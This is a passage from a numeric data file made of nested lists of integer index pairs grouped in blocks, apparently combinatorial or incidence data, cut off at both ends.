26],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 6 , 17],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 17],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 27],[ 7 , 28],[ 7 , 29],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 17],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 27],[ 8 , 28],[ 8 , 29],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 9 , 17],[ 9 , 21],[ 9 , 22],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 10 , 18],[ 10 , 21],[ 10 , 24],[ 10 , 25],[ 10 , 27],[ 10 , 30],[ 10 , 31],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 11 , 18],[ 11 , 21],[ 11 , 24],[ 11 , 25],[ 11 , 27],[ 11 , 30],[ 11 , 31],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 12 , 18],[ 12 , 21],[ 12 , 24],[ 12 , 25],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 15 , 20],[ 15 , 23],[ 15 , 25],[ 15 , 26],[ 15 , 29],[ 15 , 31],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 36],[ 16 , 20],[ 16 , 23],[ 16 , 25],[ 16 , 26],[ 16 , 29],[ 16 , 31],[ 16 , 32],[ 16 , 34],[ 16 , 35],[ 16 , 36]],[ [1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 1 , 32],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 26],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 5 , 38],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 26],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 6 , 38],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 23],[ 9 , 27],[ 9 , 28],[ 9 , 29],[ 9 , 33],[ 9 , 34],[ 9 , 35],[ 9 , 39],[ 9 , 40],[ 9 , 41],[ 10 , 23],[ 10 , 27],[ 10 , 
28],[ 10 , 29],[ 10 , 33],[ 10 , 34],[ 10 , 35],[ 10 , 39],[ 10 , 40],[ 10 , 41],[ 11 , 23],[ 11 , 27],[ 11 , 28],[ 11 , 29],[ 11 , 33],[ 11 , 34],[ 11 , 35],[ 11 , 39],[ 11 , 40],[ 11 , 41],[ 12 , 24],[ 12 , 27],[ 12 , 30],[ 12 , 31],[ 12 , 33],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 12 , 40],[ 12 , 42],[ 13 , 24],[ 13 , 27],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 13 , 40],[ 13 , 42],[ 14 , 24],[ 14 , 27],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 14 , 42],[ 15 , 24],[ 15 , 27],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 15 , 42],[ 16 , 25],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 16 , 41],[ 16 , 42],[ 17 , 25],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 17 , 41],[ 17 , 42],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 41],[ 18 , 42],[ 19 , 26],[ 19 , 29],[ 19 , 31],[ 19 , 32],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 40],[ 19 , 41],[ 19 , 42],[ 20 , 26],[ 20 , 29],[ 20 , 31],[ 20 , 32],[ 20 , 35],[ 20 , 37],[ 20 , 38],[ 20 , 40],[ 20 , 41],[ 20 , 42],[ 21 , 26],[ 21 , 29],[ 21 , 31],[ 21 , 32],[ 21 , 35],[ 21 , 37],[ 21 , 38],[ 21 , 40],[ 21 , 41],[ 21 , 42],[ 22 , 26],[ 22 , 29],[ 22 , 31],[ 22 , 32],[ 22 , 35],[ 22 , 37],[ 22 , 38],[ 22 , 40],[ 22 , 41],[ 22 , 42]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 5 , 18],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 6 , 18],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 7 , 18],[ 7 , 19],[ 7 , 20],[ 7 , 21],[ 7 , 28],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 8 , 18],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 28],[ 8 , 29],[ 8 , 30],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 18],[ 9 , 22],[ 9 , 23],[ 9 , 24],[ 9 , 28],[ 9 , 29],[ 9 , 30],[ 9 , 34],[ 9 , 35],[ 9 , 36],[ 10 , 19],[ 10 , 22],[ 10 , 25],[ 10 , 26],[ 10 , 28],[ 10 , 31],[ 10 , 32],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 11 , 19],[ 11 , 22],[ 11 , 25],[ 11 , 26],[ 11 , 28],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 12 , 19],[ 12 , 22],[ 12 , 25],[ 12 , 26],[ 12 , 28],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 13 , 20],[ 13 , 23],[ 13 , 25],[ 13 , 27],[ 13 , 29],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 14 , 20],[ 14 , 23],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 27],[ 15 , 30],[ 15 , 32],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 37],[ 16 , 21],[ 16 , 24],[ 16 , 26],[ 16 , 27],[ 16 , 30],[ 16 , 32],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 37],[ 17 , 21],[ 17 , 24],[ 17 , 26],[ 17 , 27],[ 17 , 30],[ 17 , 32],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 37]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 2 , 32],[ 2 , 33],[ 2 , 34],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 3 , 32],[ 3 , 33],[ 3 , 34],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 
31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 16],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 17],[ 8 , 20],[ 8 , 23],[ 8 , 24],[ 8 , 26],[ 8 , 29],[ 8 , 30],[ 8 , 32],[ 8 , 33],[ 8 , 35],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 18],[ 11 , 21],[ 11 , 23],[ 11 , 25],[ 11 , 27],[ 11 , 29],[ 11 , 31],[ 11 , 32],[ 11 , 34],[ 11 , 35],[ 12 , 18],[ 12 , 21],[ 12 , 23],[ 12 , 25],[ 12 , 27],[ 12 , 29],[ 12 , 31],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 
31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 19],[ 9 , 23],[ 9 , 24],[ 9 , 25],[ 9 , 29],[ 9 , 30],[ 9 , 31],[ 9 , 35],[ 9 , 36],[ 9 , 37],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 20],[ 13 , 23],[ 13 , 26],[ 13 , 27],[ 13 , 29],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 28],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 
24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 38],[ 8 , 39],[ 8 , 40],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 4 , 36],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 21],[ 11 , 25],[ 11 , 26],[ 11 , 27],[ 11 , 31],[ 11 , 32],[ 11 , 33],[ 11 , 37],[ 11 , 38],[ 11 , 39],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 22],[ 14 , 25],[ 14 , 28],[ 14 , 29],[ 14 , 31],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 15 , 
22],[ 15 , 25],[ 15 , 28],[ 15 , 29],[ 15 , 31],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 30],[ 19 , 32],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 